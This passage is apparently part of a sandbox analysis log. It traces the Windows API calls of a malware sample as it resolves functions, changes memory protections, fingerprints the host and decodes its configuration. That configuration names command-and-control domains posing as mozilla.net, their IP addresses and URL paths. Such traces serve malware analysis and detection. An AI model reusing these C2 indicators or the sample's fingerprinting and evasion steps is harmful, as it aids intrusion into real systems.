lpProcName="lstrcatA") returned 0x75162b4a [0043.269] GetProcAddress (hModule=0x75130000, lpProcName="QueryPerformanceCounter") returned 0x75141705 [0043.269] GetProcAddress (hModule=0x75130000, lpProcName="GetComputerNameW") returned 0x7514dcc6 [0043.269] GetProcAddress (hModule=0x75130000, lpProcName="WideCharToMultiByte") returned 0x751416ed [0043.270] GetProcAddress (hModule=0x75130000, lpProcName="GetComputerNameExA") returned 0x751c488f [0043.270] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76030000 [0043.270] GetProcAddress (hModule=0x76030000, lpProcName=0x2) returned 0x76034642 [0043.270] GetProcAddress (hModule=0x76030000, lpProcName=0x10) returned 0x7604deeb [0043.270] GetProcAddress (hModule=0x76030000, lpProcName=0xf) returned 0x7604e263 [0043.270] GetProcAddress (hModule=0x76030000, lpProcName=0x6) returned 0x76033e59 [0043.270] VirtualProtect (in: lpAddress=0x2f0000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x11ff1dc | out: lpflOldProtect=0x11ff1dc*=0x40) returned 1 [0043.270] VirtualProtect (in: lpAddress=0x2f1000, dwSize=0x7813, flNewProtect=0x20, lpflOldProtect=0x11ff1dc | out: lpflOldProtect=0x11ff1dc*=0x40) returned 1 [0043.272] VirtualProtect (in: lpAddress=0x2f9000, dwSize=0xf64, flNewProtect=0x2, lpflOldProtect=0x11ff1dc | out: lpflOldProtect=0x11ff1dc*=0x40) returned 1 [0043.272] VirtualProtect (in: lpAddress=0x2fa000, dwSize=0x3e8, flNewProtect=0x4, lpflOldProtect=0x11ff1dc | out: lpflOldProtect=0x11ff1dc*=0x40) returned 1 [0043.273] VirtualProtect (in: lpAddress=0x2fb000, dwSize=0xeae, flNewProtect=0x4, lpflOldProtect=0x11ff1dc | out: lpflOldProtect=0x11ff1dc*=0x40) returned 1 [0043.273] VirtualProtect (in: lpAddress=0x2fc000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x11ff1dc | out: lpflOldProtect=0x11ff1dc*=0x40) returned 1 [0043.275] HeapCreate (flOptions=0x0, dwInitialSize=0x400000, dwMaximumSize=0x0) returned 0x2860000 [0043.284] GetTickCount () returned 0x19f460c [0043.284] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x110 [0043.284] GetVersion () returned 0x1db10106 [0043.284] GetCurrentProcessId () returned 0xed8 [0043.284] OpenProcess (dwDesiredAccess=0x10047a, bInheritHandle=0, dwProcessId=0xed8) returned 0x114 [0043.284] SwitchToThread () returned 1 [0043.284] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x11ff1c8 | out: lpSystemTimeAsFileTime=0x11ff1c8*(dwLowDateTime=0x28665dc0, dwHighDateTime=0x1d92f76)) [0043.286] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x1000) returned 0x2c587d0 [0043.286] memcpy (in: _Dst=0x2c587d0, _Src=0x2fb000, _Size=0x1000 | out: _Dst=0x2c587d0) returned 0x2c587d0 [0043.319] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c587d0 | out: hHeap=0x2860000) returned 1 [0043.326] Sleep (dwMilliseconds=0xc0) [0043.536] SwitchToThread () returned 1 [0043.536] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x11ff1c8 | out: lpSystemTimeAsFileTime=0x11ff1c8*(dwLowDateTime=0x288a1260, dwHighDateTime=0x1d92f76)) [0043.537] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x1000) returned 0x2c587d0 [0043.537] memcpy (in: _Dst=0x2c587d0, _Src=0x2fb000, _Size=0x1000 | out: _Dst=0x2c587d0) returned 0x2c587d0 [0043.537] Sleep (dwMilliseconds=0x18) [0043.559] GetModuleHandleA (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0043.562] GetProcAddress (hModule=0x75130000, lpProcName="IsWow64Process") returned 0x7514193e [0043.562] IsWow64Process (in: hProcess=0x114, Wow64Process=0x11ff1d0 | out: Wow64Process=0x11ff1d0*=1) returned 1 [0043.568] GetModuleHandleA (lpModuleName="NTDLL.DLL") [0043.568] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x77460000 [0043.568] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x756b0000 [0043.568] GetProcAddress (hModule=0x756b0000, lpProcName="CoInitializeEx") returned 0x756f09ad [0043.568] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0043.582] NtOpenProcess (in: ProcessHandle=0x11ff16c, DesiredAccess=0x400, ObjectAttributes=0x11ff14c*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x11ff164*(UniqueProcess=0xed8, UniqueThread=0x0) | out: ProcessHandle=0x11ff16c*=0x138) returned 0x0 [0043.582] NtOpenProcessToken (in: ProcessHandle=0x138, DesiredAccess=0x8, TokenHandle=0x11ff170 | out: TokenHandle=0x11ff170*=0x13c) returned 0x0 [0043.582] NtQueryInformationToken (in: TokenHandle=0x13c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x11ff17c | out: TokenInformation=0x0, ReturnLength=0x11ff17c) returned 0xc0000023 [0043.582] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x24) returned 0x2c597d8 [0043.582] NtQueryInformationToken (in: TokenHandle=0x13c, TokenInformationClass=0x1, TokenInformation=0x2c597d8, TokenInformationLength=0x24, ReturnLength=0x11ff17c | out: TokenInformation=0x2c597d8, ReturnLength=0x11ff17c) returned 0x0 [0043.582] memcpy (in: _Dst=0x11ff190, _Src=0x2c597e0, _Size=0x1c | out: _Dst=0x11ff190) returned 0x11ff190 [0043.583] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c597d8 | out: hHeap=0x2860000) returned 1 [0043.583] NtClose (Handle=0x13c) returned 0x0 [0043.583] NtClose (Handle=0x138) returned 0x0 [0043.583] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x75910000 [0043.584] GetProcAddress (hModule=0x75910000, lpProcName="OpenProcessToken") returned 0x75924304 [0043.584] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20008, TokenHandle=0x11ff170 | out: TokenHandle=0x11ff170*=0x138) returned 1 [0043.584] GetProcAddress (hModule=0x75910000, lpProcName="GetTokenInformation") returned 0x7592431c [0043.584] GetTokenInformation (in: TokenHandle=0x138, TokenInformationClass=0x14, TokenInformation=0x11ff16c, TokenInformationLength=0x4, ReturnLength=0x11ff174 | out: TokenInformation=0x11ff16c, ReturnLength=0x11ff174) returned 1 [0043.584] GetProcAddress (hModule=0x75910000, lpProcName="GetTokenInformation") returned 0x7592431c [0043.584] GetTokenInformation (in: TokenHandle=0x138, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x11ff174 | out: TokenInformation=0x0, ReturnLength=0x11ff174) returned 0 [0043.584] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x14) returned 0x2c597d8 [0043.584] GetProcAddress (hModule=0x75910000, lpProcName="GetTokenInformation") returned 0x7592431c [0043.584] GetTokenInformation (in: TokenHandle=0x138, TokenInformationClass=0x19, TokenInformation=0x2c597d8, TokenInformationLength=0x14, ReturnLength=0x11ff174 | out: TokenInformation=0x2c597d8, ReturnLength=0x11ff174) returned 1 [0043.584] GetProcAddress (hModule=0x75910000, lpProcName="GetSidSubAuthorityCount") returned 0x75920e0c [0043.584] GetSidSubAuthorityCount (pSid=0x2c597e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x2c597e1 [0043.584] GetProcAddress (hModule=0x75910000, lpProcName="GetSidSubAuthority") returned 0x75920e24 [0043.584] GetSidSubAuthority (pSid=0x2c597e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x2c597e8 [0043.585] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c597d8 | out: hHeap=0x2860000) returned 1 [0043.585] CloseHandle (hObject=0x138) returned 1 [0043.586] GetProcAddress (hModule=0x75910000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorA") returned 0x7591ca94 [0043.586] ConvertStringSecurityDescriptorToSecurityDescriptorA (in: StringSecurityDescriptor="S:(ML;;NW;;;LW)D:(A;;0x1fffff;;;WD)(A;;0x1fffff;;;S-1-15-2-1)(A;;0x1fffff;;;S-1-15-3-1)", StringSDRevision=0x1, SecurityDescriptor=0x2fa350, SecurityDescriptorSize=0x0 | out: SecurityDescriptor=0x2fa350*=0x0*(Revision=0x1, Sbz1=0x0, Control=0x8014, Owner=0x0*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x14), Group=0x0*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x14, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x30), Sacl=0x14*(AclRevision=0x14, Sbz1=0x0, AclSize=0x0, AceCount=0x30, Sbz2=0x0), Dacl=0x30*(AclRevision=0x30, Sbz1=0x0, AclSize=0x0, AceCount=0x2, Sbz2=0x1c)), SecurityDescriptorSize=0x0) returned 1 [0043.587] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x11ff1a4 | out: lpSystemTimeAsFileTime=0x11ff1a4*(dwLowDateTime=0x28913680, dwHighDateTime=0x1d92f76)) [0043.587] _snwprintf (in: _Dest=0x11ff178, _Count=0x16, _Format="%S%x" | out: _Dest="Local\\12d15") returned 11 [0043.587] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x2fa34c, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1000, lpName="Local\\12d15") returned 0x138 [0043.588] GetLastError () returned 0xb7 [0043.588] MapViewOfFile (hFileMappingObject=0x138, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x300000 [0043.588] CloseHandle (hObject=0x138) returned 1 [0043.588] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x42) returned 0x2c597d8 [0043.588] GetVersionExA (in: lpVersionInformation=0x11ff114*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x2f0000, dwMinorVersion=0x7747fc52, dwBuildNumber=0x7504ebb0, dwPlatformId=0x138, szCSDVersion="ÿÿÿÿhñ\x1f\x01") | out: lpVersionInformation=0x11ff114*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0043.588] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75810000 [0043.588] GetProcAddress (hModule=0x75810000, lpProcName="wsprintfA") returned 0x7583ae5f [0043.588] wsprintfA (in: param_1=0x2c597d8, param_2="%u.%u_%u_%u_x%u" | out: param_1="6.1_1_7601_x64") returned 14 [0043.588] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x60) returned 0x2c59828 [0043.588] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x43) returned 0x2c59890 [0043.588] wsprintfA (in: param_1=0x2c59890, param_2="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)" | out: param_1="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)") returned 50 [0043.589] GetProcAddress (hModule=0x75910000, lpProcName="GetUserNameW") returned 0x7592157a [0043.589] GetUserNameW (in: lpBuffer=0x0, pcbBuffer=0x11ff1ac | out: lpBuffer=0x0, pcbBuffer=0x11ff1ac) returned 0 [0043.590] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x14) returned 0x2c598e0 [0043.590] GetUserNameW (in: lpBuffer=0x2c598e0, pcbBuffer=0x11ff1ac | out: lpBuffer="kEecfMwgj", pcbBuffer=0x11ff1ac) returned 1 [0043.590] HeapFree (hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c598e0) [0043.590] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c598e0 | out: hHeap=0x2860000) returned 1 [0043.590] GetComputerNameW (in: lpBuffer=0x0, nSize=0x11ff1ac | out: lpBuffer=0x0, nSize=0x11ff1ac) returned 0 [0043.590] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x16) returned 0x2c598e0 [0043.590] GetComputerNameW (in: lpBuffer=0x2c598e0, nSize=0x11ff1ac | out: lpBuffer="Q9IATRKPRH", nSize=0x11ff1ac) returned 1 [0043.591] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c598e0 | out: hHeap=0x2860000) returned 1 [0043.591] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x111) returned 0x2c598e0 [0043.591] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x1dc) returned 0x2c59a00 [0043.591] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x203) returned 0x2c59be8 [0043.591] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x753a0000 [0043.591] GetProcAddress (hModule=0x753a0000, lpProcName="StrToIntExA") returned 0x753de27e [0043.591] StrToIntExA (in: pszString="3", dwFlags=0x0, piRet=0x11ff1ac | out: piRet=0x11ff1ac) returned 1 [0043.591] GetProcAddress (hModule=0x753a0000, lpProcName="StrToIntExA") returned 0x753de27e [0043.591] StrToIntExA (in: pszString="5", dwFlags=0x0, piRet=0x11ff1ac | out: piRet=0x11ff1ac) returned 1 [0043.592] GetProcAddress (hModule=0x753a0000, lpProcName="StrToIntExA") returned 0x753de27e [0043.592] StrToIntExA (in: pszString="0", dwFlags=0x0, piRet=0x11ff1ac | out: piRet=0x11ff1ac) returned 1 [0043.592] GetProcAddress (hModule=0x753a0000, lpProcName="StrToIntExA") returned 0x753de27e [0043.592] StrToIntExA (in: pszString="20005", dwFlags=0x0, piRet=0x11ff1ac | out: piRet=0x11ff1ac) returned 1 [0043.592] GetProcAddress (hModule=0x753a0000, lpProcName="StrToIntExA") returned 0x753de27e [0043.592] StrToIntExA (in: pszString="50", dwFlags=0x0, piRet=0x11ff1ac | out: piRet=0x11ff1ac) returned 1 [0043.592] GetProcAddress (hModule=0x753a0000, lpProcName="StrToIntExA") returned 0x753de27e [0043.592] StrToIntExA (in: pszString="0", dwFlags=0x0, piRet=0x11ff1ac | out: piRet=0x11ff1ac) returned 1 [0043.592] lstrlenA (lpString="OFX3RdYc8A5rFAaL") returned 16 [0043.592] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x11) returned 0x2c59df8 [0043.592] memcpy (in: _Dst=0x2c59df8, _Src=0x2c59dd1, _Size=0x10 | out: _Dst=0x2c59df8) returned 0x2c59df8 [0043.592] lstrlenA (lpString="trackingg-protectioon.cdn4.mozilla.net 80.77.23.77 trackingg-protectioon.cdn4.mozilla.net 80.77.25.109 protectioon.cdn4.mozilla.net 170.130.165.182 protectioon.cdn4.mozilla.net 80.77.25.114") returned 189 [0043.592] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xbe) returned 0x2c59e18 [0043.592] memcpy (in: _Dst=0x2c59e18, _Src=0x2c59cf8, _Size=0xbd | out: _Dst=0x2c59e18) returned 0x2c59e18 [0043.593] GetProcAddress (hModule=0x753a0000, lpProcName="StrChrA") [0043.593] GetProcAddress (hModule=0x753a0000, lpProcName="StrChrA") returned 0x753ac5e6 [0043.593] StrChrA (lpStart="trackingg-protectioon.cdn4.mozilla.net 80.77.23.77 trackingg-protectioon.cdn4.mozilla.net 80.77.25.109 protectioon.cdn4.mozilla.net 170.130.165.182 protectioon.cdn4.mozilla.net 80.77.25.114", wMatch=0x20) returned=" 80.77.23.77 trackingg-protectioon.cdn4.mozilla.net 80.77.25.109 protectioon.cdn4.mozilla.net 170.130.165.182 protectioon.cdn4.mozilla.net 80.77.25.114" [0043.593] GetProcAddress (hModule=0x753a0000, lpProcName="StrChrA") returned 0x753ac5e6 [0043.593] StrChrA (lpStart="80.77.23.77 trackingg-protectioon.cdn4.mozilla.net 80.77.25.109 protectioon.cdn4.mozilla.net 170.130.165.182 protectioon.cdn4.mozilla.net 80.77.25.114", wMatch=0x20) returned=" trackingg-protectioon.cdn4.mozilla.net 80.77.25.109 protectioon.cdn4.mozilla.net 170.130.165.182 protectioon.cdn4.mozilla.net 80.77.25.114" [0043.593] GetProcAddress (hModule=0x753a0000, lpProcName="StrChrA") returned 0x753ac5e6 [0043.593] StrChrA (lpStart="trackingg-protectioon.cdn4.mozilla.net 80.77.25.109 protectioon.cdn4.mozilla.net 170.130.165.182 protectioon.cdn4.mozilla.net 80.77.25.114", wMatch=0x20) returned=" 80.77.25.109 protectioon.cdn4.mozilla.net 170.130.165.182 protectioon.cdn4.mozilla.net 80.77.25.114" [0043.593] GetProcAddress (hModule=0x753a0000, lpProcName="StrChrA") returned 0x753ac5e6 [0043.593] StrChrA (lpStart="80.77.25.109 protectioon.cdn4.mozilla.net 170.130.165.182 protectioon.cdn4.mozilla.net 80.77.25.114", wMatch=0x20) returned=" protectioon.cdn4.mozilla.net 170.130.165.182 protectioon.cdn4.mozilla.net 80.77.25.114" [0043.593] GetProcAddress (hModule=0x753a0000, lpProcName="StrChrA") returned 0x753ac5e6 [0043.593] StrChrA (lpStart="protectioon.cdn4.mozilla.net 170.130.165.182 protectioon.cdn4.mozilla.net 80.77.25.114", wMatch=0x20) returned=" 170.130.165.182 protectioon.cdn4.mozilla.net 80.77.25.114" [0043.593] GetProcAddress (hModule=0x753a0000, lpProcName="StrChrA") returned 0x753ac5e6 [0043.594] StrChrA (lpStart="170.130.165.182 protectioon.cdn4.mozilla.net 80.77.25.114", wMatch=0x20) returned=" protectioon.cdn4.mozilla.net 80.77.25.114" [0043.594] GetProcAddress (hModule=0x753a0000, lpProcName="StrChrA") returned 0x753ac5e6 [0043.594] StrChrA (lpStart="protectioon.cdn4.mozilla.net 80.77.25.114", wMatch=0x20) returned=" 80.77.25.114" [0043.594] GetProcAddress (hModule=0x753a0000, lpProcName="StrChrA") returned 0x753ac5e6 [0043.594] StrChrA (lpStart="80.77.25.114", wMatch=0x20) returned 0x0 [0043.594] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x20) returned 0x2c59ee0 [0043.594] GetProcAddress (hModule=0x753a0000, lpProcName="StrTrimA") returned 0x753de63c [0043.594] StrTrimA (in: psz="trackingg-protectioon.cdn4.mozilla.net 80.77.23.77 trackingg-protectioon.cdn4.mozilla.net 80.77.25.109 protectioon.cdn4.mozilla.net 170.130.165.182 protectioon.cdn4.mozilla.net 80.77.25.114", pszTrimChars=" \x09" | out: psz="trackingg-protectioon.cdn4.mozilla.net 80.77.23.77 trackingg-protectioon.cdn4.mozilla.net 80.77.25.109 protectioon.cdn4.mozilla.net 170.130.165.182 protectioon.cdn4.mozilla.net 80.77.25.114") returned 0 [0043.594] GetProcAddress (hModule=0x753a0000, lpProcName="StrChrA") returned 0x753ac5e6 [0043.594] StrChrA (lpStart="trackingg-protectioon.cdn4.mozilla.net 80.77.23.77 trackingg-protectioon.cdn4.mozilla.net 80.77.25.109 protectioon.cdn4.mozilla.net 170.130.165.182 protectioon.cdn4.mozilla.net 80.77.25.114", wMatch=0x20) returned=" 80.77.23.77 trackingg-protectioon.cdn4.mozilla.net 80.77.25.109 protectioon.cdn4.mozilla.net 170.130.165.182 protectioon.cdn4.mozilla.net 80.77.25.114" [0043.594] GetProcAddress (hModule=0x753a0000, lpProcName="StrChrA") returned 0x753ac5e6 [0043.594] StrChrA (lpStart="80.77.23.77 trackingg-protectioon.cdn4.mozilla.net 80.77.25.109 protectioon.cdn4.mozilla.net 170.130.165.182 protectioon.cdn4.mozilla.net 80.77.25.114", wMatch=0x20) returned=" trackingg-protectioon.cdn4.mozilla.net 80.77.25.109 protectioon.cdn4.mozilla.net 170.130.165.182 protectioon.cdn4.mozilla.net 80.77.25.114" [0043.594] GetProcAddress (hModule=0x753a0000, lpProcName="StrChrA") returned 0x753ac5e6 [0043.594] StrChrA (lpStart="trackingg-protectioon.cdn4.mozilla.net 80.77.25.109 protectioon.cdn4.mozilla.net 170.130.165.182 protectioon.cdn4.mozilla.net 80.77.25.114", wMatch=0x20) returned=" 80.77.25.109 protectioon.cdn4.mozilla.net 170.130.165.182 protectioon.cdn4.mozilla.net 80.77.25.114" [0043.594] GetProcAddress (hModule=0x753a0000, lpProcName="StrChrA") returned 0x753ac5e6 [0043.594] StrChrA (lpStart="80.77.25.109 protectioon.cdn4.mozilla.net 170.130.165.182 protectioon.cdn4.mozilla.net 80.77.25.114", wMatch=0x20) returned=" protectioon.cdn4.mozilla.net 170.130.165.182 protectioon.cdn4.mozilla.net 80.77.25.114" [0043.595] GetProcAddress (hModule=0x753a0000, lpProcName="StrChrA") returned 0x753ac5e6 [0043.595] StrChrA (lpStart="protectioon.cdn4.mozilla.net 170.130.165.182 protectioon.cdn4.mozilla.net 80.77.25.114", wMatch=0x20) returned=" 170.130.165.182 protectioon.cdn4.mozilla.net 80.77.25.114" [0043.595] GetProcAddress (hModule=0x753a0000, lpProcName="StrChrA") returned 0x753ac5e6 [0043.595] StrChrA (lpStart="170.130.165.182 protectioon.cdn4.mozilla.net 80.77.25.114", wMatch=0x20) returned=" protectioon.cdn4.mozilla.net 80.77.25.114" [0043.595] GetProcAddress (hModule=0x753a0000, lpProcName="StrChrA") returned 0x753ac5e6 [0043.595] StrChrA (lpStart="protectioon.cdn4.mozilla.net 80.77.25.114", wMatch=0x20) returned=" 80.77.25.114" [0043.595] GetProcAddress (hModule=0x753a0000, lpProcName="StrChrA") returned 0x753ac5e6 [0043.595] StrChrA (lpStart="80.77.25.114", wMatch=0x20) returned 0x0 [0043.595] lstrlenA (lpString="/fonts/") returned 7 [0043.595] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x8) returned 0x2c59f08 [0043.595] memcpy (in: _Dst=0x2c59f08, _Src=0x2c59db6, _Size=0x7 | out: _Dst=0x2c59f08) returned 0x2c59f08 [0043.595] lstrlenA (lpString=".bak") returned 4 [0043.595] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x5) returned 0x2c59f18 [0043.595] memcpy (in: _Dst=0x2c59f18, _Src=0x2c59dbe, _Size=0x4 | out: _Dst=0x2c59f18) returned 0x2c59f18 [0043.596] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59be8 | out: hHeap=0x2860000) returned 1 [0043.597] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a00 | out: hHeap=0x2860000) returned 1 [0043.597] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x1dc) returned 0x2c59a00 [0043.597] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x1dc) returned 0x2c59be8 [0043.597] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x5db) returned 0x2c59f28 [0043.597] lstrcpyA (in: lpString1=0x2c5a02c, lpString2="Mark" | out: lpString1="Mark") returned="Mark" [0043.597] lstrcatA (in: lpString1="Mark", lpString2="Virtual" | out: lpString1="MarkVirtual") returned="MarkVirtual" [0043.597] lstrlenA (lpString="MarkVirtual") returned 11 [0043.597] lstrcpyA (in: lpString1=0x2c5a038, lpString2="Line" | out: lpString1="Line") returned="Line" [0043.597] lstrcatA (in: lpString1="Line", lpString2="Tool" | out: lpString1="LineTool") returned="LineTool" [0043.597] lstrcmpA (lpString1="MarkVirtual", lpString2="LineTool") returned 1 [0043.604] lstrlenA (lpString="LineTool") returned 8 [0043.604] lstrcpyA (in: lpString1=0x2c5a041, lpString2="Reply" | out: lpString1="Reply") returned="Reply" [0043.604] lstrcatA (in: lpString1="Reply", lpString2="Type" | out: lpString1="ReplyType") returned="ReplyType" [0043.604] lstrcmpA (lpString1="MarkVirtual", lpString2="ReplyType") returned -1 [0043.604] lstrcmpA (lpString1="LineTool", lpString2="ReplyType") returned -1 [0043.604] lstrlenA (lpString="ReplyType") returned 9 [0043.604] lstrcpyA (in: lpString1=0x2c5a04b, lpString2="Value" | out: lpString1="Value") returned="Value" [0043.604] lstrcatA (in: lpString1="Value", lpString2="Folder" | out: lpString1="ValueFolder") returned="ValueFolder" [0043.604] lstrcmpA (lpString1="MarkVirtual", lpString2="ValueFolder") returned -1 [0043.604] lstrcmpA (lpString1="LineTool", lpString2="ValueFolder") returned -1 [0043.604] lstrcmpA (lpString1="ReplyType", lpString2="ValueFolder") returned -1 [0043.604] lstrlenA (lpString="ValueFolder") returned 11 [0043.604] lstrcpyA (in: lpString1=0x2c5a057, lpString2="Black" | out: lpString1="Black") returned="Black" [0043.604] lstrcatA (in: lpString1="Black", lpString2="Folder" | out: lpString1="BlackFolder") returned="BlackFolder" [0043.604] lstrcmpA (lpString1="MarkVirtual", lpString2="BlackFolder") returned 1 [0043.604] lstrcmpA (lpString1="LineTool", lpString2="BlackFolder") returned 1 [0043.604] lstrcmpA (lpString1="ReplyType", lpString2="BlackFolder") returned 1 [0043.604] lstrcmpA (lpString1="ValueFolder", lpString2="BlackFolder") returned 1 [0043.604] lstrlenA (lpString="BlackFolder") returned 11 [0043.604] lstrcpyA (in: lpString1=0x2c5a063, lpString2="Char" | out: lpString1="Char") returned="Char" [0043.604] lstrcatA (in: lpString1="Char", lpString2="Book" | out: lpString1="CharBook") returned="CharBook" [0043.604] lstrcmpA (lpString1="MarkVirtual", lpString2="CharBook") returned 1 [0043.604] lstrcmpA (lpString1="LineTool", lpString2="CharBook") returned 1 [0043.604] lstrcmpA (lpString1="ReplyType", lpString2="CharBook") returned 1 [0043.605] lstrcmpA (lpString1="ValueFolder", lpString2="CharBook") returned 1 [0043.605] lstrcmpA (lpString1="BlackFolder", lpString2="CharBook") returned -1 [0043.605] lstrlenA (lpString="CharBook") returned 8 [0043.605] lstrcpyA (in: lpString1=0x2c5a06c, lpString2="Mark" | out: lpString1="Mark") returned="Mark" [0043.605] lstrcatA (in: lpString1="Mark", lpString2="Device" | out: lpString1="MarkDevice") returned="MarkDevice" [0043.605] lstrcmpA (lpString1="MarkVirtual", lpString2="MarkDevice") returned 1 [0043.605] lstrcmpA (lpString1="LineTool", lpString2="MarkDevice") returned -1 [0043.605] lstrcmpA (lpString1="ReplyType", lpString2="MarkDevice") returned 1 [0043.605] lstrcmpA (lpString1="ValueFolder", lpString2="MarkDevice") returned 1 [0043.605] lstrcmpA (lpString1="BlackFolder", lpString2="MarkDevice") returned -1 [0043.605] lstrcmpA (lpString1="CharBook", lpString2="MarkDevice") returned -1 [0043.605] lstrlenA (lpString="MarkDevice") returned 10 [0043.605] lstrcpyA (in: lpString1=0x2c5a077, lpString2="Mouse" | out: lpString1="Mouse") returned="Mouse" [0043.605] lstrcatA (in: lpString1="Mouse", lpString2="Byte" | out: lpString1="MouseByte") returned="MouseByte" [0043.605] lstrcmpA (lpString1="MarkVirtual", lpString2="MouseByte") returned -1 [0043.605] lstrcmpA (lpString1="LineTool", lpString2="MouseByte") returned -1 [0043.605] lstrcmpA (lpString1="ReplyType", lpString2="MouseByte") returned 1 [0043.605] lstrcmpA (lpString1="ValueFolder", lpString2="MouseByte") returned 1 [0043.605] lstrcmpA (lpString1="BlackFolder", lpString2="MouseByte") returned -1 [0043.605] lstrcmpA (lpString1="CharBook", lpString2="MouseByte") returned -1 [0043.605] lstrcmpA (lpString1="MarkDevice", lpString2="MouseByte") returned -1 [0043.605] lstrlenA (lpString="MouseByte") returned 9 [0043.605] lstrcpyA (in: lpString1=0x2c5a081, lpString2="Active" | out: lpString1="Active") returned="Active" [0043.605] lstrcatA (in: lpString1="Active", lpString2="Book" | out: lpString1="ActiveBook") returned="ActiveBook" [0043.605] lstrcmpA (lpString1="MarkVirtual", lpString2="ActiveBook") returned 1 [0043.605] lstrcmpA (lpString1="LineTool", lpString2="ActiveBook") returned 1 [0043.605] lstrcmpA (lpString1="ReplyType", lpString2="ActiveBook") returned 1 [0043.605] lstrcmpA (lpString1="ValueFolder", lpString2="ActiveBook") returned 1 [0043.606] lstrcmpA (lpString1="BlackFolder", lpString2="ActiveBook") returned 1 [0043.606] lstrcmpA (lpString1="CharBook", lpString2="ActiveBook") returned 1 [0043.606] lstrcmpA (lpString1="MarkDevice", lpString2="ActiveBook") returned 1 [0043.606] lstrcmpA (lpString1="MouseByte", lpString2="ActiveBook") returned 1 [0043.606] lstrlenA (lpString="ActiveBook") returned 10 [0043.606] lstrcpyA (in: lpString1=0x2c5a08c, lpString2="Mark" | out: lpString1="Mark") returned="Mark" [0043.606] lstrcatA (in: lpString1="Mark", lpString2="Tool" | out: lpString1="MarkTool") returned="MarkTool" [0043.606] lstrcmpA (lpString1="MarkVirtual", lpString2="MarkTool") returned 1 [0043.606] lstrcmpA (lpString1="LineTool", lpString2="MarkTool") returned -1 [0043.606] lstrcmpA (lpString1="ReplyType", lpString2="MarkTool") returned 1 [0043.606] lstrcmpA (lpString1="ValueFolder", lpString2="MarkTool") returned 1 [0043.606] lstrcmpA (lpString1="BlackFolder", lpString2="MarkTool") returned -1 [0043.606] 